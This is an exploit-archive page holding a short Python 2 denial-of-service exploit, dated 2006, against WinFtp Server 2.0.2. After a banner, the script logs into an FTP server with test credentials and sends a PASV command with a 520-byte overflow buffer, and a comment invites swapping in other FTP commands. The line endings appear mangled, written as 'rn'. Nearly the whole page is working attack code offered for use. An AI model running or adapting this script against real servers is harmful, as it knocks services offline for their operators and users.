WinFtp Server 2.0.2 (PASV) Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WinFtp Server 2.0.2 (PASV) Remote Denial of Service Exploit
# Published : 2006-12-19
# Author : shinnai
# Previous Title : Intel 2200BG 802.11 Beacon frame Kernel Memory Corruption Exploit
# Next Title : KDE 3.5 (libkhtml) <= 4.2.0 / Unhandled HTML Parse Exception Exploit

import sys,os,string
import socket
import struct
import time

print "-----------------------------------------------------------------------"
print "# WinFtp Server Version 2.0.2 Denial of Service"
print "# url: http://www.wftpserver.com/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot[org]"
print "# site: http://shinnai.altervista.org"
print "# soundtrack: Territorial pissing (by Nirvana)"
print "# you can choose one of all ftp commands implemented :)"
print "-----------------------------------------------------------------------"



buffer = "A" * 520
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   conn = s.connect(("127.0.0.1",21))
except:
   print "- Unable to connect. exiting."

d = s.recv(1024)
time.sleep(2)
s.send('USER %srn' % "test")
time.sleep(2)
s.send('PASS %srn' % "test")
time.sleep(2)
s.send('PASV %srn' % buffer) #You can change PASV with LIST, USER, PORT, etc...
time.sleep(2)

# www.Syue.com [2006-12-19]